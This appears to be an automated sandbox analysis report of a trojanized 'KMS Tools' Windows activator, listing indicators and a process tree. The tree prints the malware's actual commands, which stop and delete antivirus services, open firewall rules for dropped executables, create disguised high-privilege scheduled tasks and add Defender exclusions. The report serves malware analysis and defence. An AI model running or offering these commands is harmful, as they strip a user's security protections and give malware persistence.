Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	taskhostw.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	KMS Tools Unpack.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found

AutoIT Executable 64 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral8/memory/1760-135-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	autoit_exe
behavioral8/memory/1760-136-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	autoit_exe
behavioral8/memory/1760-137-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	autoit_exe
behavioral8/memory/1760-138-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	autoit_exe
behavioral8/memory/1760-139-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	autoit_exe
behavioral8/memory/1760-140-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	autoit_exe
behavioral8/memory/1760-141-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	autoit_exe
behavioral8/memory/1760-148-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	autoit_exe
behavioral8/memory/1760-154-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	autoit_exe
behavioral8/memory/4776-203-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	autoit_exe
behavioral8/memory/4776-204-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	autoit_exe
behavioral8/memory/4776-205-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	autoit_exe
behavioral8/memory/4776-206-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	autoit_exe
behavioral8/memory/4776-207-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	autoit_exe
behavioral8/memory/4776-208-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	autoit_exe
behavioral8/memory/4776-209-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	autoit_exe
behavioral8/memory/4776-214-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	autoit_exe
behavioral8/memory/4732-217-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	autoit_exe
behavioral8/memory/4776-216-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	autoit_exe
behavioral8/memory/4732-218-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	autoit_exe
behavioral8/memory/4732-219-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	autoit_exe
behavioral8/memory/4732-221-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	autoit_exe
behavioral8/memory/4732-222-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	autoit_exe
behavioral8/memory/4776-234-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	autoit_exe
behavioral8/memory/4732-238-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	autoit_exe
behavioral8/memory/4732-240-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	autoit_exe
behavioral8/memory/1760-254-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	autoit_exe
behavioral8/memory/4732-255-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	autoit_exe
behavioral8/memory/4732-258-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	autoit_exe
behavioral8/memory/1760-268-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	autoit_exe
behavioral8/memory/5064-284-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/5064-287-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/1348-289-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	autoit_exe
behavioral8/memory/5064-290-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/1348-291-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	autoit_exe
behavioral8/memory/1348-292-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	autoit_exe
behavioral8/memory/5064-293-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/5064-294-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/1348-295-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	autoit_exe
behavioral8/memory/5064-296-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/1348-297-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	autoit_exe
behavioral8/memory/1348-298-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	autoit_exe
behavioral8/memory/5064-299-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/1348-300-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	autoit_exe
behavioral8/memory/5064-302-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/1348-308-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	autoit_exe
behavioral8/memory/5064-312-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/1348-313-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	autoit_exe
behavioral8/memory/4840-404-0x00007FF618D10000-0x00007FF619B7A000-memory.dmp	autoit_exe
behavioral8/memory/2408-406-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/4336-450-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/4336-467-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/1648-504-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/2308-549-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/2308-566-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/4608-607-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/4044-663-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/4044-667-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/4952-705-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/228-753-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/228-762-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/2296-812-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/4636-875-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe
behavioral8/memory/5056-914-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 47 IoCs

pid	Process
1760	KMS Tools Unpack.exe
4776	Process not Found
4732	Process not Found
1348	taskhostw.exe
5064	taskhost.exe
2220	Process not Found
4840	Process not Found
2408	Process not Found
3856	Process not Found
4336	Process not Found
1648	Process not Found
2388	Process not Found
2308	Process not Found
4608	Process not Found
1864	Process not Found
4044	Process not Found
4952	Process not Found
228	Process not Found
2140	Process not Found
2296	Process not Found
4532	Process not Found
4636	Process not Found
5056	Process not Found
3604	Process not Found
2864	Process not Found
2792	Process not Found
2172	Process not Found
5112	Process not Found
424	Process not Found
2580	Process not Found
3200	Process not Found
1648	Process not Found
2852	Process not Found
1752	Process not Found
4976	Process not Found
3196	Process not Found
4088	Process not Found
4964	Process not Found
1728	Process not Found
2908	Process not Found
3988	Process not Found
4184	Process not Found
2656	Process not Found
2280	Process not Found
1668	Process not Found
632	Process not Found
2980	Process not Found

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4124	sc.exe
5116	sc.exe
4144	sc.exe
2388	sc.exe
224	sc.exe
1808	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
2672	schtasks.exe
1028	schtasks.exe
1260	schtasks.exe
4992	schtasks.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
2152	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command-Line Interface

T1059

pid	Process
3612	ipconfig.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	KMS.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	KMS.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\RealtekHD\winmgmts:\localhost\root\CIMV2	taskhost.exe
File opened for modification	C:\ProgramData\RealtekHD\winmgmts:\localhost\	taskhost.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
4368	PING.EXE
1192	Process not Found
5000	Process not Found
1068	Process not Found
2816	PING.EXE
4352	Process not Found
4828	Process not Found
4824	Process not Found
1904	Process not Found
2096	Process not Found
4308	Process not Found
1964	Process not Found
1500	Process not Found
4876	Process not Found
1160	Process not Found
2056	Process not Found
672	Process not Found
5008	Process not Found
4080	Process not Found
5048	Process not Found
732	Process not Found
4876	Process not Found
2864	Process not Found
2832	PING.EXE
3048	Process not Found
2424	Process not Found
1648	Process not Found
1640	PING.EXE
4300	Process not Found
2224	Process not Found
5084	Process not Found
5024	Process not Found
1064	Process not Found
1664	Process not Found
4976	Process not Found
1144	Process not Found
3692	Process not Found
1928	Process not Found
3028	Process not Found
4988	Process not Found
768	Process not Found
4856	Process not Found
4260	Process not Found
1972	Process not Found
4492	PING.EXE
4700	Process not Found
4388	Process not Found
3432	Process not Found
1696	Process not Found
1676	PING.EXE
60	Process not Found
3688	Process not Found
4576	Process not Found
4368	Process not Found
1008	Process not Found
2888	Process not Found
2788	Process not Found
3736	Process not Found
3016	Process not Found
856	Process not Found
4336	Process not Found
2896	Process not Found
4664	Process not Found
5004	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1820	PING.EXE
1820	PING.EXE
4776	Process not Found
4776	Process not Found
4776	Process not Found
4776	Process not Found
4776	Process not Found
4776	Process not Found
4776	Process not Found
4776	Process not Found
4776	Process not Found
4776	Process not Found
4776	Process not Found
4776	Process not Found
4732	Process not Found
4732	Process not Found
4732	Process not Found
4732	Process not Found
4732	Process not Found
4732	Process not Found
4732	Process not Found
4732	Process not Found
1760	PING.EXE
1760	PING.EXE
1760	PING.EXE
1760	PING.EXE
5064	taskhost.exe
5064	taskhost.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe
1348	taskhostw.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1348	taskhostw.exe
5064	taskhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
664	Process not Found

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1820	PING.EXE
Token: SeLockMemoryPrivilege	264	Process not Found
Token: SeLockMemoryPrivilege	264	Process not Found

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
264	Process not Found

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
4776	Process not Found
4732	Process not Found
2832	Process not Found
5064	taskhost.exe
1348	taskhostw.exe
4596	Process not Found
4840	Process not Found
264	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1760 wrote to memory of 1132	1760	KMS Tools Unpack.exe	84
PID 1760 wrote to memory of 1132	1760	KMS Tools Unpack.exe	84
PID 1760 wrote to memory of 1132	1760	KMS Tools Unpack.exe	84
PID 1760 wrote to memory of 3560	1760	KMS Tools Unpack.exe	85
PID 1760 wrote to memory of 3560	1760	KMS Tools Unpack.exe	85
PID 1760 wrote to memory of 3560	1760	KMS Tools Unpack.exe	85
PID 3560 wrote to memory of 1348	3560	KMS.exe	438
PID 3560 wrote to memory of 1348	3560	KMS.exe	438
PID 1348 wrote to memory of 1820	1348	taskhostw.exe	384
PID 1348 wrote to memory of 1820	1348	taskhostw.exe	384
PID 1132 wrote to memory of 4776	1132	PING.EXE	1528
PID 1132 wrote to memory of 4776	1132	PING.EXE	1528
PID 3560 wrote to memory of 3648	3560	PING.EXE	95
PID 3560 wrote to memory of 3648	3560	PING.EXE	95
PID 3560 wrote to memory of 3648	3560	PING.EXE	95
PID 1132 wrote to memory of 4732	1132	PING.EXE	1499
PID 1132 wrote to memory of 4732	1132	PING.EXE	1499
PID 3648 wrote to memory of 1516	3648	cmd.exe	1016
PID 3648 wrote to memory of 1516	3648	cmd.exe	1016
PID 3648 wrote to memory of 1516	3648	cmd.exe	1016
PID 3648 wrote to memory of 1180	3648	cmd.exe	201
PID 3648 wrote to memory of 1180	3648	cmd.exe	201
PID 3648 wrote to memory of 1180	3648	cmd.exe	201
PID 3648 wrote to memory of 3544	3648	cmd.exe	202
PID 3648 wrote to memory of 3544	3648	cmd.exe	202
PID 3648 wrote to memory of 3544	3648	cmd.exe	202
PID 3648 wrote to memory of 4792	3648	cmd.exe	1685
PID 3648 wrote to memory of 4792	3648	cmd.exe	1685
PID 3648 wrote to memory of 4792	3648	cmd.exe	1685
PID 3648 wrote to memory of 800	3648	cmd.exe	1688
PID 3648 wrote to memory of 800	3648	cmd.exe	1688
PID 3648 wrote to memory of 800	3648	cmd.exe	1688
PID 3648 wrote to memory of 2948	3648	cmd.exe	1605
PID 3648 wrote to memory of 2948	3648	cmd.exe	1605
PID 3648 wrote to memory of 2948	3648	cmd.exe	1605
PID 3648 wrote to memory of 1728	3648	cmd.exe	1486
PID 3648 wrote to memory of 1728	3648	cmd.exe	1486
PID 3648 wrote to memory of 1728	3648	cmd.exe	1486
PID 3648 wrote to memory of 3744	3648	cmd.exe	1696
PID 3648 wrote to memory of 3744	3648	cmd.exe	1696
PID 3648 wrote to memory of 3744	3648	cmd.exe	1696
PID 3648 wrote to memory of 3372	3648	cmd.exe	1315
PID 3648 wrote to memory of 3372	3648	cmd.exe	1315
PID 3648 wrote to memory of 3372	3648	cmd.exe	1315
PID 3648 wrote to memory of 3028	3648	cmd.exe	210
PID 3648 wrote to memory of 3028	3648	cmd.exe	210
PID 3648 wrote to memory of 3028	3648	cmd.exe	210
PID 3648 wrote to memory of 1532	3648	cmd.exe	1588
PID 3648 wrote to memory of 1532	3648	cmd.exe	1588
PID 3648 wrote to memory of 1532	3648	cmd.exe	1588
PID 3648 wrote to memory of 5072	3648	cmd.exe	1552
PID 3648 wrote to memory of 5072	3648	cmd.exe	1552
PID 3648 wrote to memory of 5072	3648	cmd.exe	1552
PID 3648 wrote to memory of 5068	3648	cmd.exe	1464
PID 3648 wrote to memory of 5068	3648	cmd.exe	1464
PID 3648 wrote to memory of 5068	3648	cmd.exe	1464
PID 3648 wrote to memory of 2864	3648	cmd.exe	1015
PID 3648 wrote to memory of 2864	3648	cmd.exe	1015
PID 3648 wrote to memory of 2864	3648	cmd.exe	1015
PID 3648 wrote to memory of 5044	3648	cmd.exe	1598
PID 3648 wrote to memory of 5044	3648	cmd.exe	1598
PID 3648 wrote to memory of 5044	3648	cmd.exe	1598
PID 3648 wrote to memory of 5036	3648	cmd.exe	1644
PID 3648 wrote to memory of 5036	3648	cmd.exe	1644

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\KMS Tools Portable\KMS Tools Unpack.exe
"C:\Users\Admin\AppData\Local\Temp\KMS Tools Portable\KMS Tools Unpack.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1760
- C:\ProgramData\Setup\install.exe
  C:\ProgramData\Setup\install.exe -palexpassword
  2⤵
  - Executes dropped EXE
  PID:1132
- - C:\ProgramData\Setup\GameGuard.exe
    "C:\ProgramData\Setup\GameGuard.exe"
    3⤵
    PID:4776
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      4⤵
      PID:1252
    - - C:\Windows\system32\sc.exe
        
        sc delete swprv
        5⤵
        Launches sc.exe
        
        PID:5116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop mbamservice
      4⤵
      PID:2768
    - - C:\Windows\system32\sc.exe
        
        sc stop mbamservice
        5⤵
        Launches sc.exe
        
        PID:4144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
      4⤵
      PID:4968
    - - C:\Windows\system32\sc.exe
        
        sc stop bytefenceservice
        5⤵
        Launches sc.exe
        
        PID:2388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
      4⤵
      PID:4024
    - - C:\Windows\system32\sc.exe
        
        sc delete bytefenceservice
        5⤵
        Launches sc.exe
        
        PID:224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete mbamservice
      4⤵
      PID:3276
    - - C:\Windows\system32\sc.exe
        
        sc delete mbamservice
        5⤵
        Launches sc.exe
        
        PID:1808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:1180
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3544
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:1556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
      4⤵
      PID:4200
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state on
        5⤵
        Modifies Windows Firewall
        
        PID:4632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete crmsvc
      4⤵
      PID:3580
    - - C:\Windows\system32\sc.exe
        
        sc delete crmsvc
        5⤵
        Launches sc.exe
        
        PID:4124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      PID:3252
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:1156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      PID:3564
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3028
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        
        PID:2208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      PID:2828
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        
        PID:3388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      PID:2720
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        
        PID:5056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      PID:4988
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1772
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        
        PID:3188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c gpupdate /force
      4⤵
      PID:888
    - - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        5⤵
        
        PID:1088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\Delete.bat
      4⤵
      PID:2768
    - - C:\Windows\system32\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:2152
- - C:\ProgramData\Setup\update.exe
    "C:\ProgramData\Setup\update.exe"
    3⤵
    PID:4732
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:4992
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\RealtekCheck" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:2672
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:1028
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\TaskCheck" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:1260
  - - C:\ProgramData\Setup\Game.exe
      C:\ProgramData\Setup\Game.exe -ppidar
      4⤵
      PID:2832
    - - C:\ProgramData\RealtekHD\taskhost.exe
        
        "C:\ProgramData\RealtekHD\taskhost.exe"
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        NTFS ADS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:5064
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        6⤵
        
        PID:3680
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        7⤵
        Gathers network information
        
        PID:3612
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        6⤵
        
        PID:5040
        
        C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        7⤵
        
        PID:3684
    - - C:\ProgramData\RealtekHD\taskhostw.exe
        
        "C:\ProgramData\RealtekHD\taskhostw.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Drops file in Drivers directory
        Checks BIOS information in registry
        Executes dropped EXE
        Adds Run key to start application
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1348
- C:\Users\Admin\AppData\Local\Temp\KMS Tools Portable\KMS.exe
  "C:\Users\Admin\AppData\Local\Temp\KMS Tools Portable\KMS.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3560
- - C:\Windows\system32\cmd.exe
    "C:\Windows\Sysnative\cmd.exe" /c powershell -noprofile -command Add-MpPreference -ThreatIDDefaultAction_Ids 2147685180 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147735507 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147736914 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147743522 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147734094 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147743421 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147765679 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 251873 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 213927 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ThreatIDDefaultAction_Ids 2147722906 -ThreatIDDefaultAction_Actions Allow -Force; Add-MpPreference -ExclusionPath C:\Windows\KMSAutoS -Force; Add-MpPreference -ExclusionPath C:\Windows\System32\SppExtComObjHook.dll -Force; Add-MpPreference -ExclusionPath C:\Windows\System32\SppExtComObjPatcher.exe -Force; Add-MpPreference -ExclusionPath C:\Windows\AAct_Tools -Force; Add-MpPreference -ExclusionPath C:\Windows\AAct_Tools\AAct_x64.exe -Force; Add-MpPreference -ExclusionPath C:\Windows\AAct_Tools\AAct_files\KMSSS.exe -Force; Add-MpPreference -ExclusionPath C:\Windows\AAct_Tools\AAct_files -Force; Add-MpPreference -ExclusionPath C:\Windows\KMS -Force;
    3⤵
    PID:1348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
